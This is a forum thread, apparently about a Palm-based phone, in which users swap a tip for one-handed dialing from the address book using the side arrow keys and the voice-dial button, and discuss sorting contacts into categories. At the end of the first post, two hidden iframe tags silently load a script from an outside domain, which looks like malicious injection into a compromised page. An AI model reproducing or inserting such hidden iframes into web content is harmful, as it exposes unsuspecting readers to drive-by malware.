+ Reply to Thread

One hand dialing

I just figured this out today, thought i should share.
    You can access and dial your address book pretty easily with one hand.

1)Press the addressbook button. Press it again to change the category if you want
    2)Scroll through the names using the the arrow keys on the side of the phone. You can also pageup and pagedown using the arrow keys in the center of the phone
    3)Press the voicedial button (the one above the arrow keys on the side of the phone)
    4)Use the arrows to select the number you want to dial
    5)Press the voicedial button to call

Maybe everyone already knew this.. oh well.
    I noticed complaints about one hand dailing, but this seems to work pretty well.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hmmm ... using categories

I knew about it - but your mention of categories was something I hadn't thought of. I have been building my address book over a period of 5 years (yes, I got my first Pilot 1000 in 1996) and have never deleted a single record. So, I'm up to over 400+ names, but probably only use 10% of them currently. Paging down through the entire list has been a real pain when doing one-handed dialing.

As a solution, I'm going to put those 10% in their own category, so that I can hit the address book button twice and go right to those records. Paging through my frequently-used category that way will be much easier!

Thanks for the tip!

-Doug

I also figured this out a few days ago.
    I was walking and trying to dial with
    the stylus and thought, " There's got
    to be a better way"! Absolutely right
    Dt, this is just as simple as dialing with
    other phones, just seems more difficult
    but you press the same number of
    buttons.

Talking

I know about it now that you posted it. Thanks. I guess I should really read the manual. I've just spent all my time playing with the phone.